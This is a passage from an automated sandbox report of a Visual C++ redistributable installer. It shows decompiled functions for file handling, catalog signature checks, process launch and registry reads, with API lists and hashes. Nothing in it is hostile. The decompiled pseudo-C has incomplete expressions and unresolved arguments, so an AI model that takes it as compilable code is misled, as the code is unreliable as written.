                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                          • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                                          • API String ID: 904508749-1201533908
                                                                          • Opcode ID: 5cd1427b1a6b92a2e10981fec4b76a4aa13d55481e552ebf53fc7a5648bcb40c
                                                                          • Instruction ID: ddba3142c0a27a899c12b43c04c9091d4d0a48c214a7795b59cfa8ca00b84d1c
                                                                          • Opcode Fuzzy Hash: 5cd1427b1a6b92a2e10981fec4b76a4aa13d55481e552ebf53fc7a5648bcb40c
                                                                          • Instruction Fuzzy Hash: E8319032D0061AFFCB119F94DC02BEEBBB5AF04711F148176FA14AA251D7719E909B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00055C68 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 98fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 80%
                                                                          			E00055C68(void* __ecx, intOrPtr _a4, WCHAR** _a8, void** _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* _t22;
				signed short _t26;
				signed short _t31;
				signed int* _t35;
				intOrPtr _t38;
				WCHAR** _t41;
				void* _t43;
				void* _t45;

				_t35 = _a16;
				_v8 = 0;
				_v12 = 0;
				 *_t35 = 0;
				_t35[1] = 0;
				_t41 = _a8;
				_t45 = E00011F20(_t41, L"%ls.R", _a4);
				if(_t45 < 0) {
					L13:
					return _t45;
				}
				_t43 = CreateFileW( *_t41, 0xc0000000, 4, 0, 4, 0x80, 0);
				if(_t43 != 0xffffffff) {
					_t38 = _v8;
					while(1) {
						_push(0);
						_push( &_v12);
						_t22 = 8;
						if(ReadFile(_t43, _t38 + _t35, _t22 - _t38, ??, ??) == 0) {
							break;
						}
						_t38 = _v8 + _v12;
						_v8 = _t38;
						if(_v12 == 0 || _t38 >= 8) {
							if(_t38 != 8) {
								 *_t35 =  *_t35 & 0x00000000;
								_t35[1] = _t35[1] & 0x00000000;
							}
							 *_a12 = _t43;
							_t43 = _t43 | 0xffffffff;
							L11:
							if(_t43 != 0xffffffff) {
								CloseHandle(_t43);
							}
							goto L13;
						} else {
							continue;
						}
					}
					_t26 = GetLastError();
					_t49 =  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
					_t45 =  >=  ? 0x80004005 :  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "dlutil.cpp", 0xc8, _t45);
					goto L11;
				}
				_t31 = GetLastError();
				_t52 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
				_t45 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
				E000137D3(0x80004005, "dlutil.cpp", 0xc1, _t45);
				goto L13;
			}













                                                                          0x00055c6e
                                                                          0x00055c75
                                                                          0x00055c78
                                                                          0x00055c7b
                                                                          0x00055c7d
                                                                          0x00055c83
                                                                          0x00055c91
                                                                          0x00055c98
                                                                          0x00055d74
                                                                          0x00055d7c
                                                                          0x00055d7c
                                                                          0x00055cb8
                                                                          0x00055cbd
                                                                          0x00055cf2
                                                                          0x00055cf5
                                                                          0x00055cf5
                                                                          0x00055cfa
                                                                          0x00055cfd
                                                                          0x00055d0e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055d13
                                                                          0x00055d1a
                                                                          0x00055d1d
                                                                          0x00055d27
                                                                          0x00055d29
                                                                          0x00055d2c
                                                                          0x00055d2c
                                                                          0x00055d33
                                                                          0x00055d35
                                                                          0x00055d68
                                                                          0x00055d6b
                                                                          0x00055d6e
                                                                          0x00055d6e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055d1d
                                                                          0x00055d3a
                                                                          0x00055d4b
                                                                          0x00055d55
                                                                          0x00055d63
                                                                          0x00000000
                                                                          0x00055d63
                                                                          0x00055cbf
                                                                          0x00055cd0
                                                                          0x00055cda
                                                                          0x00055ce8
                                                                          0x00000000

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00055CB2
                                                                          • GetLastError.KERNEL32 ref: 00055CBF
                                                                          • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00055D06
                                                                          • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00055D6E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                          • String ID: %ls.R$@Met$dlutil.cpp
                                                                          • API String ID: 2136311172-3285545792
                                                                          • Opcode ID: e285a5bcd5e5530c1910a304e545c77a39a7598b08f2672d7575cbc626e8fff8
                                                                          • Instruction ID: 2f2d7103c78f53fb92b1756c643f21e8fe8256a25fd85c113366369a4a7c8392
                                                                          • Opcode Fuzzy Hash: e285a5bcd5e5530c1910a304e545c77a39a7598b08f2672d7575cbc626e8fff8
                                                                          • Instruction Fuzzy Hash: 7931AF72A40714AFEB208B68CC49BAB7AF8EF05722F114219FE05EB1D0D7759D0586B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001C7DF Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 97fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 49%
                                                                          			E0001C7DF(void* __edx, void* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				void* __ecx;
				void* _t30;
				signed short _t31;
				intOrPtr _t37;
				intOrPtr* _t39;
				char _t42;
				void* _t47;
				void* _t50;
				char _t53;

				_t47 = __edx;
				_push(_t41);
				_t39 = _a4;
				_t53 = 0;
				_v8 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(_t39 + 4)) > 0) {
					_t42 = 0;
					_a4 = 0;
					while(1) {
						_t50 =  *_t39 + _t42;
						_t7 = _t50 + 4; // 0x4680a79
						_t53 = E0001CC57(_t42, _a8,  *_t7,  &_v8);
						if(_t53 < 0) {
							break;
						}
						_t10 = _t50 + 8; // 0x152bd
						_t53 = E000121A5(_t10,  *((intOrPtr*)(_v8 + 0x50)), 0);
						if(_t53 < 0) {
							_push("Failed to get catalog local file path");
							L13:
							_push(_t53);
							E0005012F();
						} else {
							_t12 = _t50 + 8; // 0xe90005ba
							_t30 = CreateFileW( *_t12, 0x80000000, 5, 0, 3, 0x8000000, 0);
							 *(_t50 + 0xc) = _t30;
							if(_t30 == 0xffffffff) {
								_t31 = GetLastError();
								_t57 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
								_t53 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "catalog.cpp", 0x76, _t53);
								_t22 = _t50 + 8; // 0xe90005ba
								_push( *_t22);
								_push("Failed to open catalog in working path: %ls");
								goto L10;
							} else {
								_t14 = _t50 + 8; // 0xe90005ba
								_t53 = E0002A998(_t47, _v8,  *_t14, _t30);
								if(_t53 < 0) {
									_t21 = _t50 + 8; // 0xe90005ba
									_push( *_t21);
									_push("Failed to verify catalog signature: %ls");
									L10:
									_push(_t53);
									E0005012F();
								} else {
									_t37 = _v12 + 1;
									_t42 = _a4 + 0x10;
									_v12 = _t37;
									_a4 = _t42;
									_t20 = _t39 + 4; // 0xfffe5de9
									if(_t37 <  *_t20) {
										continue;
									} else {
									}
								}
							}
						}
						goto L15;
					}
					_push("Failed to find payload for catalog file.");
					goto L13;
				}
				L15:
				return _t53;
			}














                                                                          0x0001c7df
                                                                          0x0001c7e3
                                                                          0x0001c7e5
                                                                          0x0001c7eb
                                                                          0x0001c7ed
                                                                          0x0001c7f0
                                                                          0x0001c7f6
                                                                          0x0001c7fc
                                                                          0x0001c7fe
                                                                          0x0001c802
                                                                          0x0001c807
                                                                          0x0001c80a
                                                                          0x0001c815
                                                                          0x0001c819
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001c822
                                                                          0x0001c830
                                                                          0x0001c834
                                                                          0x0001c8d2
                                                                          0x0001c8de
                                                                          0x0001c8de
                                                                          0x0001c8df
                                                                          0x0001c83a
                                                                          0x0001c84c
                                                                          0x0001c84f
                                                                          0x0001c855
                                                                          0x0001c85b
                                                                          0x0001c894
                                                                          0x0001c8a5
                                                                          0x0001c8af
                                                                          0x0001c8ba
                                                                          0x0001c8bf
                                                                          0x0001c8bf
                                                                          0x0001c8c2
                                                                          0x00000000
                                                                          0x0001c85d
                                                                          0x0001c85e
                                                                          0x0001c869
                                                                          0x0001c86d
                                                                          0x0001c88a
                                                                          0x0001c88a
                                                                          0x0001c88d
                                                                          0x0001c8c7
                                                                          0x0001c8c7
                                                                          0x0001c8c8
                                                                          0x0001c86f
                                                                          0x0001c875
                                                                          0x0001c876
                                                                          0x0001c879
                                                                          0x0001c87c
                                                                          0x0001c87f
                                                                          0x0001c882
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001c888
                                                                          0x0001c882
                                                                          0x0001c86d
                                                                          0x0001c85b
                                                                          0x00000000
                                                                          0x0001c8e6
                                                                          0x0001c8d9
                                                                          0x00000000
                                                                          0x0001c8d9
                                                                          0x0001c8e7
                                                                          0x0001c8ee

                                                                          APIs
                                                                            • Part of subcall function 0001CC57: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0001E336,000000FF,00000000,00000000,0001E336,?,?,0001DADD,?,?,?,?), ref: 0001CC82
                                                                          • CreateFileW.KERNEL32(E90005BA,80000000,00000005,00000000,00000003,08000000,00000000,000152BD,0005B450,00000000,000153B5,04680A79,?,000152B5,00000000,00015381), ref: 0001C84F
                                                                          • GetLastError.KERNEL32(?,?,?,000275F7,00015565,00015371,00015371,00000000,?,00015381,FFF9E89D,00015381,000153B5,0001533D,?,0001533D), ref: 0001C894
                                                                          Strings
                                                                          • Failed to get catalog local file path, xrefs: 0001C8D2
                                                                          • catalog.cpp, xrefs: 0001C8B5
                                                                          • Failed to verify catalog signature: %ls, xrefs: 0001C88D
                                                                          • Failed to find payload for catalog file., xrefs: 0001C8D9
                                                                          • Failed to open catalog in working path: %ls, xrefs: 0001C8C2
                                                                          • @Met, xrefs: 0001C894
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareCreateErrorFileLastString
                                                                          • String ID: @Met$Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                          • API String ID: 1774366664-3330773434
                                                                          • Opcode ID: 44d9c2a6720d97e6748686d6c056392a719149f7f311fbab9ed8f5809fdaf133
                                                                          • Instruction ID: 27c4e38a68fe6a88bb9226d7e86dcc93dcdfec1fa932765cb89e02ebfcab5cbb
                                                                          • Opcode Fuzzy Hash: 44d9c2a6720d97e6748686d6c056392a719149f7f311fbab9ed8f5809fdaf133
                                                                          • Instruction Fuzzy Hash: 7031A471A40A15BBE7119B64CC42FEEB7A4EB04710F118129FD09EB290DB71ED9097D4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005082D Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89processCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 76%
                                                                          			E0005082D(WCHAR* _a4, void _a8, short _a12, void** _a16) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t47;
				void* _t50;

				_v8 = 0;
				E0003F670(_t47,  &_v92, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t30 =  !=  ? _a8 : 0x5b524;
				_push( !=  ? _a8 : 0x5b524);
				_t50 = E00011F20( &_v8, L"\"%ls\" %ls", _a4);
				if(_t50 >= 0) {
					_v92.cb = 0x44;
					_v92.wShowWindow = _a12;
					if(CreateProcessW(_a4, _v8, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24) != 0) {
						_v24.hProcess = 0;
						 *_a16 = _v24.hProcess;
					} else {
						_t53 =  <=  ? GetLastError() : _t41 & 0x0000ffff | 0x80070000;
						_t50 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t41 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "procutil.cpp", 0x9e, _t50);
					}
				}
				if(_v24.hThread != 0) {
					CloseHandle(_v24.hThread);
					_v24.hThread = 0;
				}
				if(_v24.hProcess != 0) {
					CloseHandle(_v24.hProcess);
					_v24 = 0;
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t50;
			}









                                                                          0x0005083f
                                                                          0x00050842
                                                                          0x0005084f
                                                                          0x00050850
                                                                          0x00050851
                                                                          0x00050852
                                                                          0x00050858
                                                                          0x0005085c
                                                                          0x0005086e
                                                                          0x00050875
                                                                          0x00050882
                                                                          0x00050893
                                                                          0x000508a2
                                                                          0x000508da
                                                                          0x000508dd
                                                                          0x000508a4
                                                                          0x000508b5
                                                                          0x000508bf
                                                                          0x000508cd
                                                                          0x000508cd
                                                                          0x000508a2
                                                                          0x000508e8
                                                                          0x000508ed
                                                                          0x000508ef
                                                                          0x000508ef
                                                                          0x000508f5
                                                                          0x000508fa
                                                                          0x000508fc
                                                                          0x000508fc
                                                                          0x00050902
                                                                          0x00050907
                                                                          0x00050907
                                                                          0x00050914

                                                                          APIs
                                                                          • CreateProcessW.KERNEL32 ref: 0005089A
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 000508A4
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 000508ED
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 000508FA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$CreateErrorLastProcess
                                                                          • String ID: "%ls" %ls$@Met$D$procutil.cpp
                                                                          • API String ID: 161867955-4294435303
                                                                          • Opcode ID: c5406668a9519cad3dc8900d4416389543b54c44ea22076fffa3cadcee14e4f7
                                                                          • Instruction ID: d4a139b99a998bf0a4d2d4319fe057a989d235449b7a9b7e5a66bdcceab4ca7d
                                                                          • Opcode Fuzzy Hash: c5406668a9519cad3dc8900d4416389543b54c44ea22076fffa3cadcee14e4f7
                                                                          • Instruction Fuzzy Hash: 90213C72D0021AAFEB11EFE4CD419EFBBB9EF04316F10402AEE05B6161D7749E449BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00019A6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 56%
                                                                          			E00019A6D(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed char _t18;
				void* _t34;

				_v8 = _v8 & 0x00000000;
				_t30 = _a4;
				if(E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0) >= 0) {
					_t18 = GetFileAttributesW(_v8);
					if(_t18 != 0xffffffff) {
						if((_t18 & 0x00000010) == 0) {
							_t34 = 0x80070003;
							L9:
							if(_t34 == 0x80070002 || _t34 == 0x80070003) {
								_push(_t34);
								_push(_v8);
								E0005061A(2, "Directory search: %ls, did not find path: %ls, reason: 0x%x",  *_t30);
								_t34 = 0;
							} else {
								if(_t34 < 0) {
									_push(_v8);
									E0005012F(_t34, "Failed while searching directory search: %ls, for path: %ls",  *_t30);
								}
							}
							goto L14;
						}
						_t34 = E000180F6(_a8,  *((intOrPtr*)(_t30 + 4)), _v8, 0);
						if(_t34 >= 0) {
							goto L9;
						}
						_push("Failed to set directory search path variable.");
						goto L2;
					}
					_t34 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
					goto L9;
				} else {
					_push("Failed to format variable string.");
					L2:
					_push(_t34);
					E0005012F();
					L14:
					E00012793(_v8);
					return _t34;
				}
			}






                                                                          0x00019a71
                                                                          0x00019a7a
                                                                          0x00019a8f
                                                                          0x00019aa6
                                                                          0x00019aaf
                                                                          0x00019ac9
                                                                          0x00019ae8
                                                                          0x00019aed
                                                                          0x00019af3
                                                                          0x00019b16
                                                                          0x00019b17
                                                                          0x00019b23
                                                                          0x00019b2b
                                                                          0x00019afd
                                                                          0x00019aff
                                                                          0x00019b01
                                                                          0x00019b0c
                                                                          0x00019b11
                                                                          0x00019aff
                                                                          0x00000000
                                                                          0x00019af3
                                                                          0x00019adb
                                                                          0x00019adf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00019ae1
                                                                          0x00000000
                                                                          0x00019ae1
                                                                          0x00019ac2
                                                                          0x00000000
                                                                          0x00019a91
                                                                          0x00019a91
                                                                          0x00019a96
                                                                          0x00019a96
                                                                          0x00019a97
                                                                          0x00019b2d
                                                                          0x00019b30
                                                                          0x00019b3c
                                                                          0x00019b3c

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019A86
                                                                          • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0001A7A9,00000100,000002C0,000002C0,00000100), ref: 00019AA6
                                                                          • GetLastError.KERNEL32(?,0001A7A9,00000100,000002C0,000002C0,00000100), ref: 00019AB1
                                                                          Strings
                                                                          • Failed to format variable string., xrefs: 00019A91
                                                                          • Failed while searching directory search: %ls, for path: %ls, xrefs: 00019B06
                                                                          • Failed to set directory search path variable., xrefs: 00019AE1
                                                                          • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00019B1C
                                                                          • @Met, xrefs: 00019AB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLastOpen@16
                                                                          • String ID: @Met$Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                          • API String ID: 1811509786-1706642813
                                                                          • Opcode ID: cde7c74e141bf25449de9fee0c7a91b828299a9b1bbdbc82bef1d50f4dc2d4c7
                                                                          • Instruction ID: 128cf1eb381ee080aef757373c34f5fcaa055edea8788973219ac6293062a169
                                                                          • Opcode Fuzzy Hash: cde7c74e141bf25449de9fee0c7a91b828299a9b1bbdbc82bef1d50f4dc2d4c7
                                                                          • Instruction Fuzzy Hash: 69113D33944225F7CB226698DD12FDFBB65EF14361F200121FD00761A1D7365E94A7D6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00019C39 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E00019C39(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed char _t18;
				void* _t34;

				_v8 = _v8 & 0x00000000;
				_t30 = _a4;
				if(E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0) >= 0) {
					_t18 = GetFileAttributesW(_v8);
					if(_t18 != 0xffffffff) {
						if((_t18 & 0x00000010) != 0) {
							L12:
							_push(_v8);
							E0005061A(2, "File search: %ls, did not find path: %ls",  *_t30);
							_t34 = 0;
							L13:
							E00012793(_v8);
							return _t34;
						}
						_t34 = E000180F6(_a8,  *((intOrPtr*)(_t30 + 4)), _v8, 0);
						if(_t34 >= 0) {
							L5:
							if(_t34 == 0x80070002 || _t34 == 0x80070003) {
								goto L12;
							} else {
								if(_t34 < 0) {
									_push(_v8);
									E0005012F(_t34, "Failed while searching file search: %ls, for path: %ls",  *_t30);
								}
								goto L13;
							}
						}
						_push("Failed to set variable to file search path.");
						L2:
						_push(_t34);
						E0005012F();
						goto L13;
					}
					_t34 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
					goto L5;
				}
				_push("Failed to format variable string.");
				goto L2;
			}






                                                                          0x00019c3d
                                                                          0x00019c46
                                                                          0x00019c5b
                                                                          0x00019c72
                                                                          0x00019c7b
                                                                          0x00019cbc
                                                                          0x00019cdb
                                                                          0x00019cdb
                                                                          0x00019ce7
                                                                          0x00019cef
                                                                          0x00019cf1
                                                                          0x00019cf4
                                                                          0x00019d00
                                                                          0x00019d00
                                                                          0x00019cce
                                                                          0x00019cd2
                                                                          0x00019c91
                                                                          0x00019c97
                                                                          0x00000000
                                                                          0x00019ca1
                                                                          0x00019ca3
                                                                          0x00019ca5
                                                                          0x00019cb0
                                                                          0x00019cb5
                                                                          0x00000000
                                                                          0x00019ca3
                                                                          0x00019c97
                                                                          0x00019cd4
                                                                          0x00019c62
                                                                          0x00019c62
                                                                          0x00019c63
                                                                          0x00000000
                                                                          0x00019c69
                                                                          0x00019c8e
                                                                          0x00000000
                                                                          0x00019c8e
                                                                          0x00019c5d
                                                                          0x00000000

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019C52
                                                                          • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0001A781,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00019C72
                                                                          • GetLastError.KERNEL32(?,0001A781,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00019C7D
                                                                          Strings
                                                                          • Failed to format variable string., xrefs: 00019C5D
                                                                          • Failed while searching file search: %ls, for path: %ls, xrefs: 00019CAA
                                                                          • File search: %ls, did not find path: %ls, xrefs: 00019CE0
                                                                          • Failed to set variable to file search path., xrefs: 00019CD4
                                                                          • @Met, xrefs: 00019C7D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLastOpen@16
                                                                          • String ID: @Met$Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                          • API String ID: 1811509786-4147764969
                                                                          • Opcode ID: 397f04f396ce64659c9fb153b14f9de99abfad504e01874e910c1aa1714f619d
                                                                          • Instruction ID: 226d6f6d9e67014c1d4664774f7ab254db849390183af57795f78963b5bb13f4
                                                                          • Opcode Fuzzy Hash: 397f04f396ce64659c9fb153b14f9de99abfad504e01874e910c1aa1714f619d
                                                                          • Instruction Fuzzy Hash: EF113A32940225B7CF222A94CE52BDEBBA9EF00321F204111FD80B6161D7329E90A7D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00015BF0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 51%
                                                                          			E00015BF0(void* __ecx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				void* __edi;
				void* _t24;
				void* _t28;

				_t19 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t24 =  !=  ? L"ProgramFilesDir" : L"CommonFilesDir";
				if(E00050E3F(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion", 0x20119,  &_v8) >= 0) {
					_t28 = E00050F6E(_v8, _t24, _a8);
					if(_t28 >= 0) {
						_t28 = E00012B2E(_t19, _t24, _a8);
						if(_t28 < 0) {
							_push("Failed to ensure path was backslash terminated.");
							goto L6;
						}
					} else {
						E0005012F(_t28, "Failed to read folder path for \'%ls\'.", _t24);
					}
				} else {
					_push("Failed to open Windows folder key.");
					L6:
					_push(_t28);
					E0005012F();
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t28;
			}







                                                                          0x00015bf0
                                                                          0x00015bf3
                                                                          0x00015bf4
                                                                          0x00015c08
                                                                          0x00015c27
                                                                          0x00015c3c
                                                                          0x00015c40
                                                                          0x00015c5b
                                                                          0x00015c5f
                                                                          0x00015c61
                                                                          0x00000000
                                                                          0x00015c61
                                                                          0x00015c42
                                                                          0x00015c49
                                                                          0x00015c4e
                                                                          0x00015c29
                                                                          0x00015c29
                                                                          0x00015c66
                                                                          0x00015c66
                                                                          0x00015c67
                                                                          0x00015c6d
                                                                          0x00015c72
                                                                          0x00015c77
                                                                          0x00015c77
                                                                          0x00015c84

                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00015C77
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 47109696-3209209246
                                                                          • Opcode ID: b10e86133f2b8536908c3ee0d41f61edec4dff88db0f542f4a88a36fb3414127
